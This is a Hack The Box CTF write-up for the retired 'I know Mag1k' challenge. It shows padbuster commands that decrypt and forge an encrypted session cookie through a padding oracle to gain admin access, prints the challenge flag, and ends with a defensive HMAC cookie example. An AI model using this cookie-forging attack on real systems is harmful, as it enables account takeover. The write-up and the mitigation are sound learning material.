Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Challenge info

I know Mag1k [by rkmylo]
Can you get to the profile page of the admin?

The challenge

The website allows us to register an account and to log in with it. Of course, the objective is to eventually log in to the admin account.

IKnowMag1k - Register account

When we log in with our newly created account, we go through the following steps:

  1. POST credentials (username and password) to /login.php
    We already have a PHPSESSID cookie.
  2. Be redirected to profile.php
    Notice we receive an additional iknowmag1k cookie.
  3. GET /profile.php

The iknowmag1k cookie definitely looks interesting. It looks like a URL-encoded string. URL-decoding it results in what looks to be a Base64-encoded string. Decoding this, however, does not return any legible output, so we are probably dealing with some form of encryption.

I had to peek at the forums to find out how exactly I’m supposed to tackle this challenge. It appears we are dealing with a Padding Oracle Attack.

So we use padbuster to try to decrypt the iknowmag1k cookie, which will most probably contain something useful. We pass the script a URL to test against, our PHPSESSID cookie (since this may potentially be used in the encryption scheme), as well as our current iknowmag1k cookie. We then define the value of this last cookie as the value that has to be attacked.

$ padbuster http://docker.hackthebox.eu:32982/profile.php "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D"

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): {"user":"b8498756","role":"user"}

[+] Decrypted value (HEX): 7B2275736572223A226238343938373536222C22726F6C65223A2275736572227D0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F

[+] Decrypted value (Base64): eyJ1c2VyIjoiYjg0OTg3NTYiLCJyb2xlIjoidXNlciJ9Dw8PDw8PDw8PDw8PDw8P

-------------------------------------------------------

It looks like this cookie holds the username and role of the logged-in user. So we modify this to hold admin for both the username and the role. We then run this through padbuster again so it can encrypt a new valid cookie for us.

$ padbuster http://docker.hackthebox.eu:32982/profile.php "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" -plaintext '{"user":"admin","role":"admin"}'

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D
-------------------------------------------------------

We then reload the profile.php page, but modify the cookie value.

The flag

We are now greeted with the admin’s profile page, containing our flag 🙂

HTB{Padd1NG_Or4cl3z_AR3_WaY_T0o_6en3r0ys_ArenT_tHey???}
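
The forged cookie above is accepted because the server acts on whatever the ciphertext decrypts to, with no integrity check. As an added example (not part of the original write-up or the challenge's code), here is one way to issue and verify the same user/role claims so that any tampering gets a single uniform rejection. The function names, the cookie layout and the demo key are assumptions, and it swaps encryption for an HMAC because these claims are not secret.

```python
import base64
import binascii
import hashlib
import hmac
import json


def b64(raw: bytes) -> str:
    """URL-safe Base64, so the value can go into a cookie unchanged."""
    return base64.urlsafe_b64encode(raw).decode("ascii")


def issue_cookie(claims: dict, key: bytes) -> str:
    """Serialize the claims and append an HMAC-SHA256 tag over the exact bytes."""
    payload = json.dumps(claims, separators=(",", ":")).encode("utf-8")
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return b64(payload) + "." + b64(tag)


def read_cookie(cookie: str, key: bytes):
    """Return the claims dict, or None for ANY malformed or tampered cookie.

    Every failure takes the same path, so the response cannot be used to
    tell one kind of error from another (the signal a padding oracle needs).
    """
    try:
        payload_b64, tag_b64 = cookie.split(".")
        payload = base64.urlsafe_b64decode(payload_b64.encode("ascii"))
        tag = base64.urlsafe_b64decode(tag_b64.encode("ascii"))
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # Constant-time comparison; the payload is parsed only after it verifies.
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(payload)


if __name__ == "__main__":
    key = b"constructed-demo-key-not-a-real-secret"  # constructed sample key
    cookie = issue_cookie({"user": "b8498756", "role": "user"}, key)
    # Swap in the admin claims from this write-up but keep the old tag.
    forged = b64(b'{"user":"admin","role":"admin"}') + "." + cookie.split(".")[1]
    print(read_cookie(cookie, key))   # the original claims
    print(read_cookie(forged, key))   # rejected
```

If the cookie contents did need to stay confidential, an AEAD mode such as AES-GCM would give encryption and integrity together.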